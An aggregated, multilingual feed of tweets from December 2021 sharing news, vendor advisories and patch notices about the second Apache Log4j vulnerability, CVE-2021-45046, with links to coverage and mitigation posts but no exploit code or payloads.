2021-12-16 02:26:46“JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能” https://t.co/O1PkrLX3zn https://htn.to/BZjrVQ9ucateitei_tk
2021-12-16 02:26:14JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/LFXPqvWJck … #ニュース #雑学 #News https://www.loquy.jp/article/detail.aspx?id=00000000000000396616loquy_jp
2021-12-16 02:24:15CVE - CVE-2021-45046 https://t.co/F6sQXkG4BR http://dlvr.it/SFSWg8hatebusecurity
2021-12-16 02:22:33JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/xTg1O1Z42G https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/GFS15R
2021-12-16 02:20:16JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/GseF5dC5Yd 20 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/gigazinealt
2021-12-16 02:11:16追加 CVE-2021-45046 > USN-5197-1: Apache Log4j 2 vulnerability | Ubuntu security notices | Ubuntu https://t.co/VRbPmcgmBK https://ubuntu.com/security/notices/USN-5197-1ohhara_shiojiri
2021-12-16 02:11:02CVE-2021-45046 | Ubuntu https://t.co/RSqEj25q7z https://ubuntu.com/security/CVE-2021-45046ohhara_shiojiri
2021-12-16 01:50:12🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/SeouCUp72U https://twitter.com/i/web/status/1471296405687857153threatintelctr
2021-12-16 01:43:45🚀 Today was amazing. #AWSLambda now helps to automatically mitigate the issues in CVE-2021-44228 and CVE-2021-45046… https://t.co/Qgmqen5Df3 https://twitter.com/i/web/status/1471291850396950533MarkSailes3
2021-12-16 01:43:25CVE-2021-44228にCVE-2021-45046が追加されてお仕事も追加されるなど。めどい_fiveo_uyr_ag_
2021-12-16 01:41:02> 特定の構成において不正なJNDI検索パターンを入力値とする場合にサービス運用妨害(DoS)が生じる可能性があることが判明し、[...] この問題にはCVE-2021-45046が採番されています。 Apache Log4jの… https://t.co/Keo8AkuOmK https://twitter.com/i/web/status/1471293166011949060astellon_music
2021-12-16 01:30:09.@FortiGuardLabs Threat Signal Report: New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service… https://t.co/wv6eYdoDeB https://twitter.com/i/web/status/1471291434036867080Scheehan
2021-12-16 01:20:56An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/7vQQCeEV22 https://twitter.com/i/web/status/1471288014697648128ProductCERT
2021-12-16 01:10:18Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/M8gMOGTN20 https://t.co/Ite9RWkJx4 https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?utm_source=dlvr.it&utm_medium=twitterAI__TECH
2021-12-16 01:01:40Second #Log4j #Vulnerability (CVE-2021-45046) #Discovered — New #Patch Released https://t.co/ezw3ou5jl1 https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?_m=3n%2e009a%2e2632%2ejw0ao0ecqf%2e1obemiguelcarvajalm
2021-12-16 01:00:25Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/tkYCexRDri https://t.co/YDO4tcAAIx http://dlvr.it/SFSNCtwhitesuithack
2021-12-16 01:00:20Responding to CVE-2021-45046 (/r/cybersecurity) https://t.co/abNYg5y54F https://www.reddit.com/r/cybersecurity/comments/rhd711/responding_to_cve202145046/Bobe_bot
2021-12-16 00:52:08件のログライブラリ関係の脆弱性で新しいの出てるな (CVE-2021-45046)Linda_pp
2021-12-16 00:51:16Log4Shell 업데이트 : log4j 두번째 취약점 발견 https://t.co/ekc2CdSUNj - CVE-2021-44228 에 추가로 CVE-2021-45046 보고 - 44228을 수정한 L… https://t.co/ZYKZNISxyx https://j.mp/3H39R19 https://twitter.com/i/web/status/1471277653932253184GeekNewsBot
2021-12-16 00:45:50As to #Log4j, found and reported was the new vulnerability also in 2.15.0 as CVE-2021-45046. It was fixed in the ne… https://t.co/5MVJ69PCbO https://twitter.com/i/web/status/1471267380839940096scqrinc
2021-12-16 00:31:04Second #Log4j #Vulnerability (CVE-2021-45046) Discovered — New Patch Released #cybersecurite #Cybersecurity… https://t.co/80DxzR3vHI https://twitter.com/i/web/status/1471275662333943813DaustoC
2021-12-16 00:20:20.@FortiGuardLabs Threat Signal Report: New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service… https://t.co/en33spMGEk https://twitter.com/i/web/status/1471273853666177025mdfaridulalam
2021-12-16 00:11:55.@FortiGuardLabs Threat Signal Report: New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service… https://t.co/pOh3sjdNHF https://twitter.com/i/web/status/1471270542082727937W_Gartner
2021-12-16 00:07:46Analysis of Log4Shell vulnerability CVE-2021-45046 https://t.co/FJIkYFbdPl https://ift.tt/3F3io3jsoftwarenews42
2021-12-15 23:35:17We are bumping our releases yet another time (1.14.2, 1.13.5, 1.12.7, 1.11.6 ) in order to address CVE-2021-45046 f… https://t.co/ymjlTKRL59 https://twitter.com/i/web/status/1471260106864173057ApacheFlink
2021-12-15 23:28:19#FortiGuardLabs Threat Signal Report: New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service… https://t.co/N4ceK4Ydwc https://twitter.com/i/web/status/1471254247991910402FortiGuardLabs
2021-12-15 23:26:34Mitigate log4shell (CVE-2021-44228 and CVE-2021-45046) vulnerability attacks using Nginx LUA script… https://t.co/RCt9maR9Ta https://twitter.com/i/web/status/1471257441736216580nigroeneveld
2021-12-15 23:19:31@CyberGovAU Suggest you update your stale advisory…. Have a read of CVE-2021-45046 from https://t.co/wRDPXAhJx3 http://mitre.orgBoganJosh
2021-12-15 23:05:19CVE-2021-45046: Second Log4j Security Vulnerability Discovered https://t.co/4zsJ6gmr1I https://blog.aquasec.com/second-log4j-security-vulnerabilitykrol_valencia
2021-12-15 22:42:06Apache log4j2 CVE-2021-44228 security vulnerability, updated for WAS remediation of CVE-2021-4104, CVE-2021-45046… https://t.co/JqKcq6Et9n https://twitter.com/i/web/status/1471246966382333952rlesses
2021-12-15 22:41:17CVE-2021-45046 can suck a dick. #TechIsTrash #IHateItHerekitholliday
2021-12-15 22:31:55Ubuntu 21.10 その50 - Apache Log4j2にDoSの脆弱性(CVE-2021-45046)・セキュリティーアップデートのリリース https://t.co/CSoczaw2J9 #kledgeb https://kledgeb.blogspot.com/2021/12/ubuntu-2110-50-apache-log4j2doscve-2021.htmlkledgeb
2021-12-15 22:31:05Suggested Read: Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/mBUVKdN4ym https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ChrisShort
2021-12-15 22:30:11CVE-2021-45046: Second Log4j Security Vulnerability Discovered https://t.co/zC04DEJH2y @AquaSecTeam https://bit.ly/3m7DWV7thenewstack
2021-12-15 22:23:15Second #Log4j #Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/1vUEd5l5Fw #TheHackerNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlSecurityNewsbot
2021-12-15 22:13:32NVD - CVE-2021-45046 https://t.co/WEzYaf7CU7 https://nvd.nist.gov/vuln/detail/CVE-2021-45046?utm_campaign=2021-q4-december-customer-alert-log4j-followup-partners&utm_medium=email&utm_source=Eloquabc_vault
2021-12-15 21:40:28SEGUNDA VULNERABILIDAD DE LOG4J (CVE-2021-45046) DESCUBIERTA: LANZAMIENTO DE UN NUEVO PARCHE https://t.co/ESy1KuGeP9 https://lnkd.in/eYsgVNEigarcesvarela
2021-12-15 21:31:03Our hosted UniFi controllers have been upgraded to 6.5.55 which patches the recent log4j vulnerability CVE-2021-45046SNJSI_LLC
2021-12-15 21:10:35Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/73eSwSFHQK https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/DigitalMaddox
2021-12-15 21:10:24@c3ph CVE-2021-45046 :))0midzamani
2021-12-15 20:51:47Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/ZXd28MO02y https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046Robofarm
2021-12-15 20:51:43Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/RNPYxep9yB #programming https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ThisIsWhyICode
2021-12-15 20:24:33A second Log4j vulnerability (CVE-2021-45046) was reported on Tuesday, prompting Apache to immediately issue a pat… https://t.co/2cZQCxsDeM https://twitter.com/i/web/status/1471205998371262472safebreach
2021-12-15 20:22:50Beyond Compare is not affected by the additional log4j vulnerability announced this week, CVE-2021-45046.ScooterSoftware
2021-12-15 20:22:17Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/KDLpSXqZsD https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmllesly_cp
2021-12-15 20:12:29En train de regarder les impacts de #CVE-2021-44228 et maintenant de #CVE-2021-45046 sur les solutions logicielles… https://t.co/6orRNeXyhc https://twitter.com/i/web/status/1471210577452310537egwada
2021-12-15 20:05:45Second #Log4j #Vulnerability (CVE-2021-45046) Discovered — New #Patch Released https://t.co/75ta99XU4P… https://t.co/oriXXRCItk https://buff.ly/3oTpaDe https://twitter.com/i/web/status/1471207697446019077NcuIsao
2021-12-15 20:05:21Beyond Compare is also not affected by the additional log4j vulnerability announced this week, CVE-2021-45046. Scoo… https://t.co/OwIxjjyy8v https://twitter.com/i/web/status/1471207752026447878ScooterSoftware
2021-12-15 19:56:57URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for th… https://t.co/0r2emTDhiZ https://twitter.com/i/web/status/1471204575935873032AlirezaGhahrood
2021-12-15 19:52:56⚠️Se ha identificado una nueva vulnerabilidad CVE-2021-45046 en #log4j que está siendo explotada activamente ⚠️ https://t.co/EU9Ib1pK65Serviclients
2021-12-15 19:42:33#RT @NakedSecurity: Errrrrrrr, “off-by-ten” error; meant to say CVE-2021-45046 😬 https://t.co/TqJrgcL1EJ https://twitter.com/nakedsecurity/status/1470891832271855618Ash_Dax
2021-12-15 19:38:13Security Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/rG9jTrmiSN #cyber https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ellenke64965894
2021-12-15 19:32:32⚠️Se ha identificado una nueva vulnerabilidad CVE-2021-45046 en #log4j que está siendo explotada activamente ⚠️ https://t.co/vHSqTgqxibentelCybersec
2021-12-15 19:30:20⚠️Se ha identificado una nueva vulnerabilidad CVE-2021-45046 en #log4j que está siendo explotada activamente ⚠️ https://t.co/EU9Ib1pK65Serviclients
2021-12-15 19:14:29URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for th… https://t.co/WOQtM2Q7Sh https://twitter.com/i/web/status/14711951697561682001nt3l_GS_N3ws
2021-12-15 19:12:50Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial… https://t.co/0MicPCE1EX https://twitter.com/i/web/status/1471195617246400515oss_security
2021-12-15 19:06:21How to Automatically Mitigate Log4Shell via a Live Patch (CVE-2021-44228 + CVE-2021-45046) https://t.co/rKoCxY3Wt5 https://www.lunasec.io/docs/blog/log4shell-live-patch/greyhathackr
2021-12-15 19:03:16Errrrrrrr, “off-by-ten” error; meant to say CVE-2021-45046 😬 https://t.co/kuAyESYiDT https://twitter.com/nakedsecurity/status/1470891832271855618NakedSecurity
2021-12-15 18:49:30Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 12M (audience size) CVE-2021-45046: 5.9M CVE-2021-4389… https://t.co/SKOPUCc98H https://twitter.com/i/web/status/1471185849945661446CVEtrends
2021-12-15 18:49:16[Warning] Second #Log4j #Vulnerability (CVE-2021-45046) Discovered, New Patch Released https://t.co/bjqUarQCeB https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlAdliceSoftware
2021-12-15 18:46:44■■■■□ Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/WL0V8StZ1x https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/cKure7
2021-12-15 18:41:21All our UniFi controllers were on 6.5.54 to fix CVE-2021-44228, and today all are in 6.5.55 which patches CVE-2021-45046.controllific
2021-12-15 18:33:58New post from https://t.co/uXvPWJy6tj (CVE-2021-45046 (audio_development_kit, brocade_san_navigator, capital, cloud… https://t.co/lPZiM9NqLt http://www.sesin.at https://twitter.com/i/web/status/1471183364354981890WolfgangSesin
2021-12-15 18:33:34New post from https://t.co/9KYxtdZjkl (CVE-2021-45046 (audio_development_kit, brocade_san_navigator, capital, cloud… https://t.co/P5uUd5PUVG http://www.sesin.at https://twitter.com/i/web/status/1471183467631284225www_sesin_at
2021-12-15 18:30:12@pabb85 @UK_Daniel_Card @wdormann is CVE-2021-45046 a legit DoS or another misclassified RCE? Any thoughtsMarkSewe
2021-12-15 18:23:24Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/PSrHpFFTNv @TheHackersNewsより https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlbandersnatchist
2021-12-15 18:13:30Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec… https://t.co/lt9P3ZXQrB https://twitter.com/i/web/status/1471179749741506565RProgramming200
2021-12-15 18:05:23My new fav tweet: URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for #Log4j utility after the p… https://t.co/lhqsYzdnNz https://twitter.com/i/web/status/1471175928759914505Nihilisme10
2021-12-15 18:01:38Una segunda vulnerabilidad Log4Shell ▶️ log4j (CVE-2021-44228 + CVE-2021-45046) https://t.co/GEm5ih4XbQ https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/elhackernet
2021-12-15 18:01:25**More log4j patches** Due to CVE-2021-45046 we will do another round of additional container updates.SCALEtruecharts
2021-12-15 18:00:17Protection against CVE-2021-45046, the additional Log4j RCE vulnerability https://t.co/d8NF6uK9FS https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/zephel01
2021-12-15 17:33:46URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for th… https://t.co/pmUEEqsB3Y https://twitter.com/i/web/status/1471165666845675524CynergyApp
2021-12-15 17:32:54Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/wAkzYMg3uc https://t.co/GASIQHV1fD https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?utm_source=dlvr.it&utm_medium=twitterarswb
2021-12-15 17:31:17URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for #Log4j utility after the previous patch for t… https://t.co/ko60GXqJmO https://twitter.com/i/web/status/1471169904770371584YourAnonRiots
2021-12-15 17:17:07Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/pFg07PMRux via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmldata_nerd
2021-12-15 17:10:26Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/5CuJ6vREQi https://buff.ly/323Clsamhatta
2021-12-15 17:08:30CVE-2021-45046 https://t.co/yzqzZU1SCOKoinsaru_
2021-12-15 16:44:48CVE - CVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in… https://t.co/wcptfLuEZw https://twitter.com/i/web/status/1471156155871383559SecRecon
2021-12-15 16:43:33Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec… https://t.co/YYkp4nS3vG https://twitter.com/i/web/status/1471156566795689988RProgramming150
2021-12-15 16:41:16Parece que con pasar a 2.15.0 no era suficiente, han encontrado otra: CVE-2021-45046: hay que poner la versión de log4j-core a 2.16.0.MarionaJava
2021-12-15 16:32:46Here we go again ... a new version of the log4j vulnerability ... CVE-2021-45046 ... until now the exploitation of… https://t.co/Y8hnClqtfP https://twitter.com/i/web/status/1471150976296013830getsecureworld
2021-12-15 16:32:11"RT @TheHackersNews: URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for #Log4j utility after the… https://t.co/qfB6VDCOtb https://twitter.com/i/web/status/1471151247080271881trip_elix
2021-12-15 16:30:52log4j JDNILookup makes Dos Attack action CVE-2021-45046 https://t.co/TPQkX4Dy5z https://nvd.nist.gov/vuln/detail/CVE-2021-45046cooked_go9ma
2021-12-15 16:24:56CVE-2021-45046 🤦🏻‍♂️_Blackmac
2021-12-15 16:23:18🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/MYFJE9GmZE https://twitter.com/i/web/status/1471152961342562312threatintelctr
2021-12-15 16:20:31Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/tb7UuKJ7ri 来自 @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlkenhuangus
2021-12-15 16:16:43Security Vulnerability CVE-2021-45046 The Log4j team has been made aware of a security vulnerability, CVE-2021-4504… https://t.co/Yqw9E2eTR0 https://twitter.com/i/web/status/1471149196283727876peterpan2000355
2021-12-15 16:13:03Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/ncPh2P5rud via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlSecludIT
2021-12-15 16:10:55Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/cTiNXKvbHY via… https://t.co/ot5DbBAGfp https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html https://twitter.com/i/web/status/1471143361503535116mismoboy
2021-12-15 16:09:41Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/n6scXawdIb https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlPVynckier
2021-12-15 16:08:22Daily Summary #Cyberattacks 15 December: 🔵 New patch for second Log4J vulnerability (CVE-2021-45046) 🔵Seedworm APT… https://t.co/bT50soEXCh https://twitter.com/i/web/status/1471144298011770884S21sec
2021-12-15 16:02:572.15 vulnerable to DOS attack. CVE-2021-45046cl64rk
2021-12-15 16:01:38@ArmorDba #sqlhelp CVE-2021-45046 Log4j 1.x mitigation: Log4j 1.x is not impacted by this vulnerability.SqlWorldWide
2021-12-15 16:01:25Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released #Cybersecurity #security via… https://t.co/lzQodyDIn9 https://twitter.com/i/web/status/1471147873748275207MnkeniFrancis
2021-12-15 15:47:14Exploit for CVE-2021-45046 exploit https://t.co/5lLNR2Ke18 https://t.co/5k836mKQjn https://ift.tt/3ytk180 https://ift.tt/3dRkNSMbuaqbot
2021-12-15 15:46:12All the known softwares and framework or SaaS that are concerned by the CVE-2021-44228 or CVE-2021-45046… https://t.co/4qp8CrqTdS https://twitter.com/i/web/status/1471141302263762955idriss_neumann
2021-12-15 15:45:12UniFi controller update 6.5.55 to Update log4j version to 2.16.0 (CVE-2021-45046). #log4shell #log4j #UniFi Patch… https://t.co/U60yrTBJzN https://twitter.com/i/web/status/1471141745740156932TomLawrenceTech
2021-12-15 15:42:12Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/pRIEhzN1bB https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlSysAdmKC
2021-12-15 15:40:26Apache released Log4j version 2.16.0 in a security update to address the CVE-2021-45046 vulnerability. Please updat… https://t.co/nsI6Hrzl09 https://twitter.com/i/web/status/1471142582478688265DpsRic
2021-12-15 15:40:00As to #Log4j, found and reported was the new vulnerability also in 2.15.0 as CVE-2021-45046. It was fixed in the ne… https://t.co/w7N9DIEhDl https://twitter.com/i/web/status/1471137219616198658scqrinc
2021-12-15 15:23:43Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/EMKMk8gZ3m via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmldunsany
2021-12-15 15:23:37stopping throwing water CVE-2021-44228 CVE-2021-4104 CVE-2021-45046 https://t.co/u63O10J2xBgr00sg
2021-12-15 15:22:44Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/BGsXhyZlD9 /post https://t.co/n61QtkMnB6 https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ https://www.reddit.com/r/programming/comments/rgpxfc/analysis_of_the_2nd_log4j_cve_published_earlier/?utm_source=iftttreddit_progr
2021-12-15 15:21:23@smbciso @AccidentalCISO @NegaCISO @ConsultingCso @loquaciousloka @ravici *CVE-2021-45046BobAmich
2021-12-15 15:11:29CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-15 15:11:23Découverte de la deuxième vulnérabilité de Log4j (CVE-2021-45046) - Publication d'un nouveau correctif https://t.co/zBteZiNgDL https://bit.ly/3yrIJ8Sdjzerty
2021-12-15 15:10:56New vulnerability CVE-2021-45046, suggests that the initial patch was not sufficient so 2.15.0 is still vulnerable… https://t.co/X7bttrY14y https://twitter.com/i/web/status/1471133733793288203AppcheckNG
2021-12-15 15:10:44Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/BFdxkxI3Xh https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlgreyhathackr
2021-12-15 15:04:47As to #Log4j, found and reported was the new vulnerability also in 2.15.0 as CVE-2021-45046. It was fixed in the ne… https://t.co/fQkYMyaLkL https://twitter.com/i/web/status/1471124969081892866scqrinc
2021-12-15 15:04:22We're working on updating all of our servers to #UniFi Network version 6.5.55 today to patch CVE-2021-45046. This… https://t.co/ziNH36SiV9 https://twitter.com/i/web/status/1471125596457549825hostifi_net
2021-12-15 15:04:14CVE-2021-45046, CVE-2021-43890, and Log4Shell attribution aren't helping. https://t.co/cMRdtDNV8S https://twitter.com/sshell_/status/1469456643578490884TaylorParizo
2021-12-15 15:03:12CVE-2021-45046 has been given a CVSS Base Score of 3.7 https://t.co/0JIJCi6Hsv https://t.co/zjfycrhEL9 https://logging.apache.org/log4j/2.x/security.htmlw0mbat5eoul
2021-12-15 15:02:58CVE-2021-44228 に加えてCVE-2021-45046 まで含めたNew Relicにおける取り組みとお客様にお願いしたい対応について本社記事を抄訳しました | Apache Log4j の脆弱性に関連する New… https://t.co/O5f7Eertps https://twitter.com/i/web/status/1471127323420561412NewRelicJapan
2021-12-15 15:02:18Protection against CVE-2021-45046, the additional Log4j RCE vulnerability https://t.co/ePnjOopcWo https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/ohhara_shiojiri
2021-12-15 15:02:02@NUKIB_CZ @Lupacz Chtelo by to rozsirit, fix CVE-2021-44228 nestaci... mame tu nove CVE-2021-45046... https://t.co/SDufaqUCTs https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/d4nys3k
2021-12-15 14:47:08This was reported as CVE-2021-45046 on December 14. Following the disclosure of this vulnerability, a new version o… https://t.co/FzmjnanS4z https://twitter.com/i/web/status/1471127417402056718MCaraggiu
2021-12-15 14:36:46TalosSecurity: We've updated our #Log4J blog post to cover the newly discovered CVE-2021-45046 that's been identifi… https://t.co/H41WvxyOmi https://twitter.com/i/web/status/1471124557314637832southerncyber
2021-12-15 14:35:29Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/9UmWjx6Fjf https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/angsuman
2021-12-15 14:31:55Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/MU5cD9mvCZ #digitalforensic #Berlin https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlChbibAnas
2021-12-15 14:30:05@NakedSecurity Y'all mean CVE-2021-45046?ChirtLenger
2021-12-15 14:21:05As to #Log4j, found and reported was the new vulnerability also in 2.15.0 as CVE-2021-45046. It was fixed in the ne… https://t.co/2ppohSKneM https://twitter.com/i/web/status/1471122788232482816scqrinc
2021-12-15 14:19:48[Cloudflare] Protection against CVE-2021-45046, the additional Log4j RCE vulnerability https://t.co/tJYudPjnND https://ift.tt/3oXgFXVpshishkanov
2021-12-15 14:15:07Protection against CVE-2021-45046, the additional Log4j RCE vulnerability https://t.co/q7f0lEG0My https://gixtools.net/2021/12/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/gixtools
2021-12-15 14:11:54UniFi Network Application 6.5.55 Update to fix log4j version to 2.16.0 (CVE-2021-45046). https://t.co/CG3Ch3LMaI https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16eTomLawrenceTech
2021-12-15 14:11:05We've updated our #Log4J blog post to cover the newly discovered CVE-2021-45046 that's been identified in log4j v2.… https://t.co/4mnwEuogA7 https://twitter.com/i/web/status/1471116626539995136TalosSecurity
2021-12-15 14:07:27@LunaSecIO can you confirm that 2.15.0 is still vulnerable to RCE based on your write-up about CVE-2021-45046? If n… https://t.co/ui2tesI4Dx https://twitter.com/i/web/status/1471117282877362180farhanible
2021-12-15 14:02:51Protection against CVE-2021-45046, the additional Log4j RCE vulnerability. https://t.co/2WFAPbIYlp https://cfl.re/33wPkDACloudflare
2021-12-15 13:59:20The new #log4j vulnerability, CVE-2021-45046 (reported this Tuesday 12/14), describes a DOS impact. However, an ass… https://t.co/r4FcAtBFkn https://twitter.com/i/web/status/1471114564322349064farhanible
2021-12-15 13:32:53#cybersecurity #infosec Second #Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/1Ni5JVg7Wy https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmljos1727
2021-12-15 13:32:20New #log4j 2.12.2 artifact for Java 7 https://t.co/g9NfxjnGXj changes addressing only CVE-2021-44228 CVE-2021-45046 #Log4Shell https://logging.apache.org/log4j/log4j-2.12.2/download.htmlfpientka
2021-12-15 13:24:16Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec… https://t.co/5PQZ8nbOoy https://twitter.com/i/web/status/1471106359819186180reddit_progr
2021-12-15 13:22:22UPDATE 15/12: A 2nd vulnerability has been announced, CVE-2021-45046. We can confirm our products are not affected… https://t.co/IycXo2CrZJ https://twitter.com/i/web/status/1471107020640169988Imosphere
2021-12-15 13:15:53Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/lFSqrUQLc6 via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmljbhall56
2021-12-15 13:15:08Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial… https://t.co/1u9idTwyO2 https://twitter.com/i/web/status/1471103381485678592oss_security
2021-12-15 13:03:15第二個 Log4j 漏洞!? CVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was inco… https://t.co/uoQpBKSD5R https://twitter.com/i/web/status/1471101029425061890yschen25
2021-12-15 13:02:38Some updates on the #log4j topic: - included details of CVE-2021-45046 - added details for BTP Cloud Foundry applic… https://t.co/lG3Ls569gK https://twitter.com/i/web/status/1471101611569205248JensGleichmann
2021-12-15 13:02:11Second Log4j Vulnerability (CVE-2021-45046) Discovered https://t.co/mvRFzIAGCc #Log4j https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlaxcheron
2021-12-15 13:01:21🚨Apache Foundation publicó un nuevo parche (CVE-2021-45046) para #Log4j después de que el parche anterior para el e… https://t.co/TCSV5NmZ2k https://twitter.com/i/web/status/1471102254606397449jpcarsi
2021-12-15 13:00:53Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/wEw6u2PpJ4 a través de @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlyeroncio
2021-12-15 13:00:43“Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec” https://t.co/7Eo9NRcJ0f https://htn.to/33pazwLupHminamijoyo
2021-12-15 12:51:10Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/v1HgjqNU5J https://t.co/2BStb0YZGr https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlnicolaferrini
2021-12-15 12:42:28Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released #Cybersecurity #security https://t.co/tsHCvZJQHV https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlcybersecboardrm
2021-12-15 12:41:48@mountain_ghosts [CVE-2021-45046 enters the jndi-free chat]BradRubenstein
2021-12-15 12:41:36log4j2 developers talking about log2shell mitigation and introduce then CVE-2021-45046 Source:… https://t.co/q3kCYEeM4Y https://twitter.com/i/web/status/1471096213911093248programemes
